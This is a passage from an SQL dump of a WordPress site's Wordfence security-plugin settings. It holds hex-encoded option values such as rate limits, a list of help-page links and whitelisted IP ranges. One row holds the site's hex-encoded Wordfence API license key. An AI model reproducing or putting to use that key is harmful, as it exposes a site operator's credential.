xRows',0x32303030,'yes'),('liveTraf_maxAge',0x3330,'yes'),('neverBlockBG',0x6E65766572426C6F636B5665726966696564,'yes'),('loginSec_countFailMins',0x323430,'yes'),('loginSec_lockoutMins',0x323430,'yes'),('loginSec_strongPasswds',0x70756273,'yes'),('loginSec_breachPasswds',0x61646D696E73,'yes'),('loginSec_maxFailures',0x3230,'yes'),('loginSec_maxForgotPasswd',0x3230,'yes'),('maxGlobalRequests',0x44495341424C4544,'yes'),('maxGlobalRequests_action',0x7468726F74746C65,'yes'),('maxRequestsCrawlers',0x44495341424C4544,'yes'),('maxRequestsCrawlers_action',0x7468726F74746C65,'yes'),('maxRequestsHumans',0x44495341424C4544,'yes'),('maxRequestsHumans_action',0x7468726F74746C65,'yes'),('max404Crawlers',0x44495341424C4544,'yes'),('max404Crawlers_action',0x7468726F74746C65,'yes'),('max404Humans',0x44495341424C4544,'yes'),('max404Humans_action',0x7468726F74746C65,'yes'),('blockedTime',0x333030,'yes'),('email_summary_interval',0x7765656B6C79,'yes'),('email_summary_excluded_directories',0x77702D636F6E74656E742F63616368652C77702D636F6E74656E742F77666C6F6773,'yes'),('allowed404s',0x2F66617669636F6E2E69636F0A2F6170706C652D746F7563682D69636F6E2A2E706E670A2F2A4032782E706E670A2F62726F77736572636F6E6669672E786D6C,'yes'),('wafAlertWhitelist','','yes'),('wafAlertInterval',0x363030,'yes'),('wafAlertThreshold',0x313030,'yes'),('howGetIPs_trusted_proxies','','yes'),('scanType',0x7374616E64617264,'yes'),('manualScanType',0x6F6E63654461696C79,'yes'),('schedStartHour',0x3232,'yes'),('schedMode',0x6175746F,'yes'),('cbl_loggedInBlocked','','yes'),('cbl_action',0x626C6F636B,'yes'),('cbl_redirURL','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassViewURL','','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('blockCustomText','','yes'),('alertOn_severityLevel',0x3235,'yes'),('apiKey',0x66623761303435313834663765653632616663343431383336643938346433393132643865316166333233326465356232396363646238396230373334333265656134363830666136613431376530623466356664323333613066393736653539336565383863353762313139363337626530386232353362653432386132326133306562373438393838626261396164343361353937653531633239613663,'yes'),('keyType',0x66726565,'yes'),('isPaid','','yes'),('betaThreatDefenseFeed',0x30,'yes'),('timeoffset_wf_updated',0x31373030353833313836,'yes'),('cacheType',0x64697361626C6564,'yes'),('detectProxyRecommendation',0x52454D4F54455F41444452,'no'),('dismissAutoPrependNotice',0x30,'yes'),('onboardingAttempt1',0x6C6963656E7365,'yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial',0x30,'yes'),('needsNewTour_dashboard',0x30,'yes'),('needsNewTour_firewall',0x30,'yes'),('needsNewTour_scan',0x30,'yes'),('needsNewTour_blocking',0x30,'yes'),('needsNewTour_livetraffic',0x30,'yes'),('needsNewTour_loginsecurity',0x30,'yes'),('needsUpgradeTour_dashboard',0x30,'yes'),('needsUpgradeTour_firewall',0x30,'yes'),('needsUpgradeTour_scan',0x30,'yes'),('needsUpgradeTour_blocking',0x30,'yes'),('needsUpgradeTour_livetraffic',0x30,'yes'),('needsUpgradeTour_loginsecurity',0x30,'yes'),('supportContent',0x7B22746F70223A5B7B227469746C65223A22426C6F636B696E672054726F75626C6573686F6F74696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F626C6F636B696E675C2F74726F75626C6573686F6F74696E675C2F222C226F72646572223A307D2C7B227469746C65223A224F7074696D697A696E6720546865204669726577616C6C222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F6F7074696D697A696E672D7468652D6669726577616C6C5C2F222C226F72646572223A317D2C7B227469746C65223A22576F726466656E636520576562204170706C69636174696F6E204669726577616C6C202857414629222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F222C226F72646572223A327D2C7B227469746C65223A225363616E2054726F75626C6573686F6F74696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F74726F75626C6573686F6F74696E675C2F222C226F72646572223A337D2C7B227469746C65223A22576F726466656E636520616E64204C6974655370656564222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F73797374656D2D726571756972656D656E74735C2F6C69746573706565645C2F222C226F72646572223A347D2C7B227469746C65223A2254776F2D466163746F722041757468656E7469636174696F6E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F74776F2D666163746F722D61757468656E7469636174696F6E5C2F222C226F72646572223A357D2C7B227469746C65223A224669726577616C6C204C6561726E696E67204D6F6465222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F6C6561726E696E672D6D6F64655C2F222C226F72646572223A367D2C7B227469746C65223A225363616E20526573756C7473222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F7363616E2D726573756C74735C2F222C226F72646572223A377D2C7B227469746C65223A224920616D206C6F636B6564206F7574206F66206D792073697465222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F626C6F636B696E675C2F23692D616D2D6C6F636B65642D6F75742D6F662D6D792D73697465222C226F72646572223A387D2C7B227469746C65223A2250485020466174616C206572726F723A204661696C6564206F70656E696E6720726571756972656420776F726466656E63652D7761662E706870222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F237068702D666174616C2D6572726F722D6661696C65642D6F70656E696E672D72657175697265642D776F726466656E63652D7761662D706870222C226F72646572223A397D5D2C22616C6C223A5B7B227469746C65223A22576F726466656E63652046726565222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F776F726466656E63652D667265655C2F222C2265786365727074223A22576F726466656E6365204672656520697320616E20616C6C2D696E2D6F6E6520736563757269747920736F6C7574696F6E20666F7220576F72645072657373207765627369746573207468617420696E636C7564657320616E20656E64706F696E74206669726577616C6C2C207365637572697479207363616E6E65722C206C6F67696E2073656375726974792C20616C657274732C2063656E7472616C697A6564206D616E6167656D656E742C20616E64206D6F72652E222C226F72646572223A307D2C7B227469746C65223A22576F726466656E6365205072656D69756D222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F776F726466656E63652D7072656D69756D5C2F222C2265786365727074223A22576F726466656E6365205072656D69756D20636F6D65732077697468207265616C2D74696D65206669726577616C6C2070726F74656374696F6E2C207265616C2D74696D65207363616E207369676E6174757265732C20616E204950206164647265737320626C6F636B6C6973742C20636F756E74727920626C6F636B696E672C20616E64205072656D69756D20737570706F72742E222C226F72646572223A317D2C7B227469746C65223A22576F726466656E63652043617265222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F776F726466656E63652D636172655C2F222C2265786365727074223A22576F726466656E6365204361726520697320666F7220627573696E657373206F776E6572732077686F20706C6163652061207072656D69756D206F6E2074686569722074696D652E204F7572207465616D20696E7374616C6C732C20636F6E666967757265732C206F7074696D697A65732C20616E64206D61696E7461696E7320796F757220576F7264507265737320736974652073656375726974792E222C226F72646572223A327D2C7B227469746C65223A22576F726466656E636520526573706F6E7365222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F776F726466656E63652D726573706F6E73655C2F222C2265786365727074223A22576F726466656E636520526573706F6E736520697320666F72206D697373696F6E2D637269746963616C20576F72645072657373207765627369746573207468617420726571756972652032345C2F375C2F333635207365637572697479206D6F6E69746F72696E672077697468206120312D686F757220726573706F6E73652074696D6520616E642032342D686F75722072656D6564696174696F6E2E222C226F72646572223A337D2C7B227469746C65223A22496E636964656E7420526573706F6E7365205365727669636573222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F696E636964656E742D726573706F6E73652D73657276696365735C2F222C2265786365727074223A224C6574206F6E65206F66206F757220536563757269747920416E616C797374732068656C7020796F7520636C65616E20796F757220696E6665637465642073697465206F7220696E737065637420697420666F722076756C6E65726162696C69746965732E222C226F72646572223A347D2C7B227469746C65223A224C6963656E7365204B6579222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6170692D6B65795C2F222C2265786365727074223A22416C6C20576F726466656E636520696E7374616C6C6174696F6E73206E6565642061206C6963656E7365206B65792C20616C736F206B6E6F776E20617320616E204150492D6B65792E20546865206B65792063616E20626520612066726565206B6579206F722061205072656D69756D206B65792E20222C226F72646572223A357D2C7B227469746C65223A224163636F756E7420616E642042696C6C696E6720486973746F7279222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6163636F756E745C2F222C2265786365727074223A22486F7720746F206E6176696761746520616E642075736520796F757220576F726466656E6365206163636F756E742E222C226F72646572223A367D2C7B227469746C65223A22576F726466656E63652043656E7472616C222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F222C2265786365727074223A22576F726466656E63652043656E7472616C2070726F7669646573206120706F77657266756C20616E6420656666696369656E742077617920746F206D616E61676520746865207365637572697479206F66206D616E7920576F726450726573732073697465732076696120612073696E676C6520696E746572666163652E222C226368696C6472656E223A5B7B227469746C65223A22436F6E6E656374696E6720796F757220736974657320746F20576F726466656E63652043656E7472616C222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F636F6E6E6563745C2F222C226F72646572223A307D2C7B227469746C65223A2253657474696E672075702074776F2D666163746F722061757468656E7469636174696F6E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F3266615C2F222C226F72646572223A317D2C7B227469746C65223A225573696E67207468652044617368626F6172642070616765222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F63656E7472616C5C2F222C226F72646572223A327D2C7B227469746C65223A225573696E672074686520436F6E66696775726174696F6E2070616765222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F636F6E66696775726174696F6E5C2F222C226F72646572223A337D2C7B227469746C65223A225573696E6720576F726466656E636520706C7567696E206F7074696F6E732054656D706C61746573222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F74656D706C617465735C2F222C226F72646572223A347D2C7B227469746C65223A225573696E67207468652053657474696E67732070616765222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F73657474696E67735C2F222C226F72646572223A357D2C7B227469746C65223A2256696577696E67207363616E2046696E64696E6773222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F66696E64696E67735C2F222C226F72646572223A367D2C7B227469746C65223A225573696E6720576F726466656E63652043656E7472616C205465616D73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F63656E7472616C5C2F7465616D735C2F222C226F72646572223A377D5D2C226F72646572223A377D2C7B227469746C65223A2244617368626F617264222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F64617368626F6172645C2F222C2265786365727074223A2254686520576F726466656E63652044617368626F6172642070726F766964657320696E736967687420696E746F207468652063757272656E74207374617465206F6620796F75722073697465E28099732073656375726974792E222C226368696C6472656E223A5B7B227469746C65223A224F7074696F6E73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F64617368626F6172645C2F6F7074696F6E735C2F222C226F72646572223A307D2C7B227469746C65223A22416C65727473222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F64617368626F6172645C2F616C657274735C2F222C226F72646572223A317D5D2C226F72646572223A387D2C7B227469746C65223A224669726577616C6C222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F222C2265786365727074223A2254686520576F726466656E636520576562204170706C69636174696F6E204669726577616C6C2069732061205048502062617365642C206170706C69636174696F6E206C6576656C206669726577616C6C20746861742066696C74657273206F7574206D616C6963696F757320726571756573747320746F20796F757220736974652E20222C226368696C6472656E223A5B7B227469746C65223A224F7074696D697A696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F6F7074696D697A696E672D7468652D6669726577616C6C5C2F222C226F72646572223A307D2C7B227469746C65223A2253746174697374696373222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F737461746973746963735C2F222C226F72646572223A317D2C7B227469746C65223A224C6561726E696E67204D6F6465222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F6C6561726E696E672D6D6F64655C2F222C226F72646572223A327D2C7B227469746C65223A224F7074696F6E73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F6F7074696F6E735C2F222C226F72646572223A337D2C7B227469746C65223A224D7953514C692073746F7261676520656E67696E65222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F6D7973716C692D73746F726167652D656E67696E655C2F222C226F72646572223A347D2C7B227469746C65223A22427275746520466F7263652050726F74656374696F6E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F62727574652D666F7263655C2F222C226F72646572223A357D2C7B227469746C65223A2252617465204C696D6974696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F726174652D6C696D6974696E675C2F222C226F72646572223A367D2C7B227469746C65223A2254726F75626C6573686F6F74696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6669726577616C6C5C2F74726F75626C6573686F6F74696E675C2F222C226F72646572223A377D5D2C226F72646572223A397D2C7B227469746C65223A22426C6F636B696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F626C6F636B696E675C2F222C2265786365727074223A2241736964652066726F6D20746865206669726577616C6C2072756C657320746861742070726F7465637420616761696E737420766172696F75732061747461636B732C20576F726466656E636520616C736F2068617320637573746F6D20666561747572657320666F72206164646974696F6E616C20626C6F636B696E672E20222C226368696C6472656E223A5B7B227469746C65223A22436F756E74727920426C6F636B696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F626C6F636B696E675C2F636F756E7472792D626C6F636B696E675C2F222C226F72646572223A307D2C7B227469746C65223A22426C6F636B696E672054726F75626C6573686F6F74696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F626C6F636B696E675C2F74726F75626C6573686F6F74696E675C2F222C226F72646572223A317D5D2C226F72646572223A31307D2C7B227469746C65223A225363616E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F222C2265786365727074223A224120576F726466656E6365207363616E206578616D696E657320616C6C2066696C6573206F6E20796F757220576F726450726573732077656273697465206C6F6F6B696E6720666F72206D616C6963696F757320636F64652C206261636B646F6F72732C20616E64207368656C6C732074686174206861636B657273206861766520696E7374616C6C65642E20497420616C736F207363616E7320666F72206B6E6F776E206D616C6963696F75732055524C7320616E64206B6E6F776E207061747465726E73206F6620696E66656374696F6E732E222C226368696C6472656E223A5B7B227469746C65223A224F7074696F6E73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F6F7074696F6E735C2F222C226F72646572223A307D2C7B227469746C65223A22526573756C7473222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F7363616E2D726573756C74735C2F222C226F72646572223A317D2C7B227469746C65223A225363686564756C696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F7363686564756C696E675C2F222C226F72646572223A327D2C7B227469746C65223A2254726F75626C6573686F6F74696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F7363616E5C2F74726F75626C6573686F6F74696E675C2F222C226F72646572223A337D5D2C226F72646572223A31317D2C7B227469746C65223A22546F6F6C73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F222C2265786365727074223A22576F726466656E636520546F6F6C7320696E636C756465204C697665205472616666696320616E616C797369732C2057484F4953204C6F6F6B75702C20496D706F72745C2F4578706F7274204F7074696F6E732C20616E6420446961676E6F73746963732E222C226368696C6472656E223A5B7B227469746C65223A224C6976652054726166666963222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F6C6976652D747261666669635C2F222C226F72646572223A307D2C7B227469746C65223A2257484F4953204C6F6F6B7570222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F77686F69732D6C6F6F6B75705C2F222C226F72646572223A317D2C7B227469746C65223A22496D706F72745C2F4578706F7274222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F696D706F72742D6578706F72745C2F222C226F72646572223A327D2C7B227469746C65223A22446961676E6F7374696373222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F646961676E6F73746963735C2F222C226F72646572223A337D2C7B227469746C65223A224C65676163792054776F2D466163746F722041757468656E7469636174696F6E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F6C65676163792D74776F2D666163746F722D61757468656E7469636174696F6E5C2F222C226F72646572223A347D2C7B227469746C65223A2254776F2D466163746F722041757468656E7469636174696F6E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F746F6F6C735C2F74776F2D666163746F722D61757468656E7469636174696F6E5C2F222C226F72646572223A357D5D2C226F72646572223A31327D2C7B227469746C65223A224C6F67696E205365637572697479222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6C6F67696E2D73656375726974795C2F222C2265786365727074223A22546865204C6F67696E20536563757269747920706167652063757272656E746C7920636F6E7461696E732073657474696E677320666F722074776F2D666163746F722061757468656E7469636174696F6E20283246412920616E64207265434150544348412E20496E20612066757475726520576F726466656E63652076657273696F6E2C206578697374696E67206C6F67696E2D72656C617465642066656174757265732077696C6C20616C736F206D6F766520746F207468652073616D6520706167652E222C226F72646572223A31337D2C7B227469746C65223A22416476616E636564222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F222C2265786365727074223A22496620796F752077616E7420746F206B6E6F77206D6F72652061626F75742074686520746563686E6963616C2064657461696C73206F6620576F726466656E63652C20796F752077696C6C2066696E642074686520616E737765727320696E20746869732073656374696F6E2E222C226368696C6472656E223A5B7B227469746C65223A22436F6D7061746962696C697479222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F636F6D7061746962696C6974795C2F222C226F72646572223A307D2C7B227469746C65223A22546563686E6963616C2044657461696C73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F746563686E6963616C2D64657461696C735C2F222C226F72646572223A317D2C7B227469746C65223A224368616E67656C6F67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F6368616E67656C6F675C2F222C226F72646572223A327D2C7B227469746C65223A22436F6E7374616E7473222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F636F6E7374616E74735C2F222C226F72646572223A337D2C7B227469746C65223A2252656D6F7665206F72205265736574222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F72656D6F76652D6F722D72657365745C2F222C226F72646572223A347D2C7B227469746C65223A2253797374656D20726571756972656D656E7473222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F73797374656D2D726571756972656D656E74735C2F222C226F72646572223A357D2C7B227469746C65223A22576F726466656E636520415049222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F776F726466656E63652D6170695C2F222C226F72646572223A367D2C7B227469746C65223A2254726F75626C6573686F6F74696E67222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F74726F75626C6573686F6F74696E675C2F222C226F72646572223A377D2C7B227469746C65223A22506C7567696E205C2F205468656D6520436F6E666C69637473222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F616476616E6365645C2F706C7567696E2D7468656D652D636F6E666C696374735C2F222C226F72646572223A387D5D2C226F72646572223A31347D2C7B227469746C65223A22576F726466656E636520616E642047445052202D2047656E6572616C20446174612050726F74656374696F6E20526567756C6174696F6E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F67656E6572616C2D646174612D70726F74656374696F6E2D726567756C6174696F6E5C2F222C2265786365727074223A2244656669616E742C2074686520636F6D70616E7920626568696E6420576F726466656E63652C20686173207570646174656420697473207465726D73206F66207573652C207072697661637920706F6C696369657320616E6420736F6674776172652C2061732077656C6C206173206D61646520617661696C61626C65207374616E6461726420636F6E747261637475616C20636C617573657320746F206D656574204744505220636F6D706C69616E63652E20437573746F6D657273206D7573742072657669657720616E6420616772656520746F2075706461746564207465726D7320696E206F7264657220746F20636F6E74696E7565207573696E67206F75722070726F647563747320616E642073657276696365732E222C226368696C6472656E223A5B7B227469746C65223A225375622D50726F636573736F7273204C697374222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F67656E6572616C2D646174612D70726F74656374696F6E2D726567756C6174696F6E5C2F7375622D70726F636573736F72732D6C6973745C2F222C226F72646572223A307D5D2C226F72646572223A31357D2C7B227469746C65223A224C6F67696E20536563757269747920506C7567696E222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F6C6F67696E2D73656375726974792D706C7567696E5C2F222C2265786365727074223A2254686520576F726466656E6365204C6F67696E20536563757269747920706C7567696E20636F6E7461696E73206120737562736574206F662074686520666561747572657320666F756E6420696E207468652066756C6C20576F726466656E636520706C7567696E3A2054776F2D666163746F722041757468656E7469636174696F6E2C20584D4C2D5250432050726F74656374696F6E20616E64204C6F67696E205061676520434150544348412E20497420697320696465616C20666F722073697465732074686174206E656564206C6F67696E2073656375726974792066756E6374696F6E616C69747920627574206569746865722063616EE2809974206F7220646F6EE28099742077616E7420746F2072756E207468652066756C6C20576F726466656E636520706C7567696E2E222C226F72646572223A31367D2C7B227469746C65223A22576F726466656E636520496E74656C6C6967656E636520576562686F6F6B204E6F74696669636174696F6E73222C227065726D616C696E6B223A2268747470733A5C2F5C2F7777772E776F726466656E63652E636F6D5C2F68656C705C2F776F726466656E63652D696E74656C6C6967656E63652D776562686F6F6B2D6E6F74696669636174696F6E735C2F222C2265786365727074223A2253746179206F6E20746F70206F6620746865206C617465737420576F726450726573732076756C6E65726162696C69746965732074686174206172652061646465642C20757064617465642C20616E642072656D6F7665642066726F6D2074686520576F726466656E636520496E74656C6C6967656E636520576F726450726573732056756C6E65726162696C697479204461746162617365207574696C697A696E67206F757220776562686F6F6B206E6F74696669636174696F6E732E205573652074686520536C61636B20616E6420446973636F726420696E746567726174696F6E20746F206265206E6F746966696564206F6620746865206E65776573742076756C6E65726162696C697469657320696E207265616C2D74696D6520617320746865792061726520616464656420746F206F75722064617461626173652C206F7220666F72206D6F726520637573746F6D697A6174696F6E207574696C697A652074686520726177206E6F74696669636174696F6E7320746861742073656E6420796F752074686520636F6D706C6574652076756C6E65726162696C69747920696E666F726D6174696F6E20696E2061204A534F4E20666F726D61742E20202020222C226F72646572223A31377D5D7D,'yes'),('supportHash',0x30623939663437323137646461636661643766396331626131643937363937636239346338633461313964323861653933613832333438336132383034363131,'yes'),('whitelistPresets',0x7B22776F726466656E6365223A7B226E223A22576F726466656E6365222C2268223A747275652C2264223A747275652C2266223A747275652C2272223A5B2235342E36382E33322E323437222C2236392E34362E33362E305C2F3237222C22323630353A323430303A303130343A303130303A3A5C2F3536225D7D2C22737563757269223A7B226E223A22537563757269222C2264223A747275652C2272223A5B2239372E37342E3132372E313731222C2236392E3136342E3230332E313732222C223137332E3233302E3132382E313335222C2236362E3232382E33342E3439222C2236362E3232382E34302E313835222C2235302E3131362E33362E3932222C2235302E3131362E33362E3933222C2235302E3131362E332E313731222C223139382E35382E39362E323132222C2235302E3131362E36332E323231222C223139322E3135352E39322E313132222C223139322E38312E3132382E3331222C223139382E35382E3130362E323434222C223139322E3135352E39352E313339222C2232332E3233392E392E323237222C223139382E35382E3131322E313033222C223139322E3135352E39342E3433222C223136322E3231362E31362E3333222C223137332E3235352E3233332E313234222C223137332E3235352E3233332E313234222C223139322E3135352E39302E313739222C2235302E3131362E34312E323137222C223139322E38312E3132392E323237222C223139382E35382E3131312E3830222C223136322E3231362E31392E313833225D7D2C2266616365626F6F6B223A7B226E223A2246616365626F6F6B222C2264223A747275652C2272223A5B2236392E36332E3137362E305C2F3230222C2236362E3232302E3134342E305C2F3230222C2236362E3232302E3134342E305C2F3231222C2236392E36332E3138342E305C2F3231222C2236392E36332E3137362E305C2F3231222C2237342E3131392E37362E305C2F3232222C2236392E3137312E3235352E305C2F3234222C223137332E3235322E36342E305C2F3138222C2236392E3137312E3232342E305C2F3139222C2236392E3137312E3232342E305C2F3230222C223130332E342E39362E305C2F3232222C2236392E36332E3137362E305C2F3234222C223137332E3235322E36342E305C2F3139222C223137332E3235322E37302E305C2F3234222C2233312E31332E36342E305C2F3138222C2233312E31332E32342E305C2F3231222C2236362E3232302E3135322E305C2F3231222C2236362E3232302E3135392E305C2F3234222C2236392E3137312E3233392E305C2F3234222C2236392E3137312E3234302E305C2F3230222C2233312E31332E36342E305C2F3139222C2233312E31332E36342E305C2F3234222C2233312E31332E36352E305C2F3234222C2233312E31332E36372E305C2F3234222C2233312E31332E36382E305C2F3234222C2233312E31332E36392E305C2F3234222C2233312E31332E37302E305C2F3234222C2233312E31332E37312E305C2F3234222C2233312E31332E37322E305C2F3234222C2233312E31332E37332E305C2F3234222C2233312E31332E37342E305C2F3234222C2233312E31332E37352E305C2F3234222C2233312E31332E37362E305C2F3234222C2233312E31332E37372E305C2F3234222C2233312E31332E39362E305C2F3139222C2233312E31332E36362E305C2F3234222C223137332E3235322E39362E305C2F3139222C2236392E36332E3137382E305C2F3234222C2233312E31332E37382E305C2F3234222C2233312E31332E37392E305C2F3234222C2233312E31332E38302E305C2F3234222C2233312E31332E38322E305C2F3234222C2233312E31332E38332E305C2F3234222C2233312E31332E38342E305C2F3234222C2233312E31332E38352E305C2F3234222C2233312E31332E38362E305C2F3234222C2233312E31332E38372E305C2F3234222C2233312E31332E38382E305C2F3234222C2233312E31332E38392E305C2F3234222C2233312E31332E39302E305C2F3234222C2233312E31332E39312E305C2F3234222C2233312E31332E39322E305C2F3234222C2233312E31332E39332E305C2F3234222C2233312E31332E39342E305C2F3234222C2233312E31332E39352E305C2F3234222C2236392E3137312E3235332E305C2F3234222C2236392E36332E3138362E305C2F3234222C2233312E31332E38312E305C2F3234222C223137392E36302E3139322E305C2F3232222C223137392E36302E3139322E305C2F3234222C223137392E36302E3139332E305C2F3234222C223137392E36302E3139342E305C2F3234222C223137392E36302E3139352E305C2F3234222C223138352E36302E3231362E305C2F3232222C2234352E36342E34302E305C2F3232222C223138352E36302E3231362E305C2F3234222C223138352E36302E3231372E305C2F3234222C223138352E36302E3231382E305C2F3234222C223138352E36302E3231392E305C2F3234222C223132392E3133342E302E305C2F3136222C223135372E3234302E302E305C2F3136222C223135372E3234302E